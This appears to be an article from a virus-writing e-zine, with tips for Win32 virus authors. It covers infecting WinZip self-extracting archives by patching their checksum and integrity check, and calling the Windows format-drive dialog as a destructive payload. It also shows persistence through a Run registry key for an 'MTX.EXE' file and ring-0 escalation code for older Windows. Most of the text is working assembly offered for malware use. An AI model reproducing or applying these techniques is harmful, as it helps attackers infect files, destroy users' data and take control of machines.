Win32Tipz&Tricz
 ~~~~~~~~~~~~~~~

  - WinZip infection
  - Visual Formating Driver
  - Write to the registry
  - OutputDebugString
  - Ring0 via IRQs

 % WinZip Infection %
 ~~~~~~~~~~~~~~~~~~~~
 
  I saw very  much plenty of viruses  and many authors  do not want to infect 
  WinZip SFX archives. In  general  after  T2000 to me has explained as it to 
  make and I have given me interesting idea.

  first method
  
  These SFX's archive can be identified by  scanning the entire  host for the 
  4Eh 4Dh 43h 01h 73h 66h 78h 02h signature. Now all that needs to be done is 
  to  put a  NULL DWORD following t his  signature (checksum field), and  the 
  filecan be modified to all your likings.

  second method

  This method rather simple. That WinZip did not deduce the different message,
  that  his file  is  damaged (injured) to us it  is  necessary to change the 
  instruction jz on jmp and all will be good.

  00001942:  85C0            test    eax,eax
  00001944:  7407            jz      0000194D
  00001946:  32C0            xor     al,al
  00001948:  E9EB000000      jmp     00001A38
  0000194D:  833D6068400000  cmp     dword ptr [00406860],00000000
  00001954:  7421            jz      00001977 <- change it.. (jmp4ever)

  So we search in a file about such code 85h, 0c0h, 74h, 7h, 32h, 0c0h and we 
  change transitions in a file 74h for unconditional transition 0ebh.

  Everyone sfx the archive stores(keeps) in itself usual archive, by which it
  is possible  to add the virus_copy. WinRAR even stores (keeps) already Made 
  Sfx-exe  files (Default. SFX, Zip. SFX etc) to  which the archive is simply 
  finished. But  for infection of such files It is necessary with a beginning 
  to  unpack UPX  packer with which  the files (Default. SFX are packed, Zip. 
  SFX etc) and it not possible almost:)

  Big thnx T2000 and smart for idea and code..

 % Visual Formating Driver %
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  It not  the large  effect which opens  a window formatting of a disk. It is 
  function  undocumentary  and  many  parameters  can  be not  correct  as  I 
  described  them. I  shall not  speak much about this functions, you look as 
  it works. :)))))

   Parametrz of formatting:
   ++++++++++++++++++++++++

     CommentZ: As you will format a disk

      QUICK = 0
       FULL = 1	( i like it...)
    SYSONLY = 2

   Ability and dimension:
   ++++++++++++++++++++++

   CommentZ: I not so have understood that it for parameters on mine the size 
             which you want to format.

    DEFAULT = 0
        360 = 3
        720 = 5

   Disk numberz:
   +++++++++++++

   CommentZ: Number of a disk of system which you want to format.

        A:\ = 0
        B:\ = 1
        C:\ = 2
        D:\ = 3
        .
	etc....
	.
	Z:\ = ?

   Code:
   +++++

	push 1			; parametrz of formatting
	push 0			; ability and dimension
	push 3			; disk numberz
	push 0			; null
	call SHFormatDrive	; formatting it....

   Insert  it into yours source and look as it works... It starts only Dialog 
   FoRmat Windows, but does not make formatting.
   But  I  have  written  payload which  I formatted  disk only with the help 
   VB(VBA) (SendKeys) pressed 3 keys and it formatted a disk.


 % Writing the Registry %
 ~~~~~~~~~~~~~~~~~~~~~~~~
  What  for  to use  it is a  lot  of  RegApi (RegOpenKeyExA, RegSetValueExA, 
  RegCloseKey) it is possible to replace all by one API - SHSetValueA

   filename	db     '\MTX.EXE',0
   start_key    db     'MTX4EVER', 0
   run_services db     'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'

        push	8
	push	offset filename
	push	1
	push	offset start_key
	push	offset run_services
	push	80000002h
	call	SHSetValueA

   As there are also other functions:

	SHGetValue
	SHDeleteKey
	SHEnumKeyEx
	SHEnumValue
	SHQueryValueEx
	SHQueryInfoKey
	SHDeleteEmptyKey
  	SHDeleteKey
  	SHDeleteValue


 % OutputDebugString %
 ~~~~~~~~~~~~~~~~~~~~~

  The OutputDebugString function sends a string to the debugger for the 
  current application. 

       VOID OutputDebugString(
            LPCTSTR lpOutputString 	// pointer to string to be displayed  
            );
 

      Parameters:
       lpOutputString - Points to the null-terminated string to be displayed. 

 Info:
     If the  application  has no  debugger,  the system debugger displays the 
     string. If the  application  has no debugger and  the system debugger is 
     not active, OutputDebugString does nothing. 


   filename	db     'MTX4EVER',0

        push offset mtx
        call OutputDebugStringA

  This kewl  api  function... thnx Z0MBiE ( i ripperd  this  function  from ur 
  product Z0MBiE.10 :)))


 % Ring0 via IRQs %
 ~~~~~~~~~~~~~~~~~~
 It is small code transition in ring0 with help IRQs. I  liked this transition 
 because it very small and compact.

 code by super/29a
 correct by DjSad



   .386
   .model flat
   .code

  start:
    pushad
    mov	 ebx, 0C0001100h
    mov	 dl, 0C3h
    xchg dl, [ebx]

    WaitIRQ0:	
    cmp	 esp, ebx
    jb	 WaitIRQ0
    call Beep
    xchg dl, [ebx]
    call ebx
    popad
    ret

    Beep:		
    pushad
    in	 al, 61h
    mov	 ah, al
    or	 al, 03h
    out	 61h, al
    mov	 ecx, 1000000
    loop $
    mov	 al, ah
    out	 61h, al
    popad
    ret

   end	start

  This is  small  article was are  written for one up to an release of e-zine 
  MATRiX and consequently I had time to investigate  about 10 undocument api. 
  Probably in the following magazine you will see it.

   This articles not finished... forgive me...

   ULTRAS [MATRiX]